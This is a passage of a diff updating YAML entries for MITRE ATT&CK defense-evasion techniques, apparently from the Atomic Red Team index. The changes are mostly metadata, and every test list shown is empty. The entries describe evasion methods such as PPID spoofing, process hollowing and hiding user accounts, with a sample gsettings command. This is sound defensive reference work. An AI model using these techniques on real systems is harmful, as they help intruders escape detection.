+        Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Nick Carr, Mandiant
+      x_mitre_deprecated: false
+      x_mitre_detection: Detecting the use of guardrails may be difficult depending
+        on the implementation. Monitoring for suspicious processes being spawned that
+        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+        especially in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Nick Carr, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      x_mitre_defense_bypassed:
+      - Anti-virus
+      - Host Forensic Analysis
+      - Signature-based Detection
+      - Static File Analysis
       type: attack-pattern
       id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
       created: '2019-01-31T02:10:08.261Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1480
         url: https://attack.mitre.org/techniques/T1480
+        external_id: T1480
       - source_name: FireEye Outlook Dec 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
         description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
           the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
           June 23, 2020.'
+        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+      - source_name: Trellix-Qakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved June 7, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: FireEye Kevin Mandia Guardrails
-        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
         description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
           U.S. malware is more restrained than adversaries'. Retrieved January 17,
           2019.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
-        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Execution Guardrails
-      x_mitre_detection: Detecting the use of guardrails may be difficult depending
-        on the implementation. Monitoring for suspicious processes being spawned that
-        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
-        especially in a short period of time, may aid in detection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Command: Command Execution'
-      x_mitre_defense_bypassed:
-      - Anti-virus
-      - Host Forensic Analysis
-      - Signature-based Detection
-      - Static File Analysis
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.001:
     technique:
@@ -8146,7 +8255,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests: []
   T1205.001:
@@ -8172,7 +8280,7 @@ defense-evasion:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -8197,8 +8305,6 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.012:
     technique:
@@ -8259,7 +8365,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.002:
     technique:
@@ -8332,7 +8437,7 @@ defense-evasion:
         <code>sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true</code>).(Citation:
         Hide GDM User Accounts) Display Managers are not anchored to specific distributions
         and may be changed by a user or adversary."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T02:31:01.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Hide Artifacts: Hidden Users'
       x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -8361,7 +8466,6 @@ defense-evasion:
       - 'User Account: User Account Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.002
     atomic_tests: []
   T1134.003:
@@ -8425,11 +8529,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.940Z'
       name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
@@ -8514,12 +8617,11 @@ defense-evasion:
         url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1562.003
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -8594,45 +8696,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -8656,6 +8723,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -8666,9 +8736,14 @@ defense-evasion:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -8678,8 +8753,35 @@ defense-evasion:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1134.004:
     technique:
@@ -8736,7 +8838,7 @@ defense-evasion:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -8761,7 +8863,6 @@ defense-evasion:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests: []
   T1055.014:
@@ -8832,7 +8933,7 @@ defense-evasion:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -8859,11 +8960,10 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -8917,7 +9017,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1574.013:
     technique:
@@ -8953,7 +9052,7 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -8979,8 +9078,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.004:
     technique:
@@ -9006,7 +9103,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -9028,8 +9125,6 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1218.001:
     technique:
@@ -9095,12 +9190,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.001
     atomic_tests: []
   T1070.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-13T17:15:56.948Z'
       name: 'Indicator Removal on Host: Network Share Connection Removal'
       description: 'Adversaries may remove share connections that are no longer useful
         in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -9155,7 +9249,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.005
     atomic_tests: []
   T1562.001:
@@ -9303,7 +9396,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.001
     atomic_tests: []
   T1601:
@@ -9330,7 +9422,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:47.635Z'
       name: Modify System Image
       description: |-
         Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -9365,8 +9457,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574:
     technique:
@@ -9432,7 +9522,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.005:
     technique:
@@ -9458,7 +9547,7 @@ defense-evasion:
         Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
 
         A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:07:48.062Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Indicator Removal from Tools
       x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -9483,11 +9572,10 @@ defense-evasion:
       - Signature-based detection
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -9504,7 +9592,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -9514,7 +9601,7 @@ defense-evasion:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -9523,19 +9610,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -9583,11 +9668,12 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -9655,18 +9741,17 @@ defense-evasion:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests: []
   T1564.009:
@@ -9713,7 +9798,7 @@ defense-evasion:
         Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
 
         Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:10:23.890Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Resource Forking
       x_mitre_detection: "Identify files with the <code>com.apple.ResourceFork</code>
@@ -9735,7 +9820,6 @@ defense-evasion:
       - Gatekeeper
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027:
     technique:
@@ -9810,6 +9894,7 @@ defense-evasion:
       - 'Script: Script Execution'
       - 'File: File Creation'
       - 'Module: Module Load'
+      - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'File: File Metadata'
       - 'Process: OS API Execution'
@@ -9869,12 +9954,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -9903,24 +9987,26 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -9955,9 +10041,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.001:
     technique:
@@ -9980,7 +10063,7 @@ defense-evasion:
         url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
         description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
           Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-02-10T19:52:47.724Z'
       name: Invalid Code Signature
       description: |-
         Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -9998,8 +10081,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
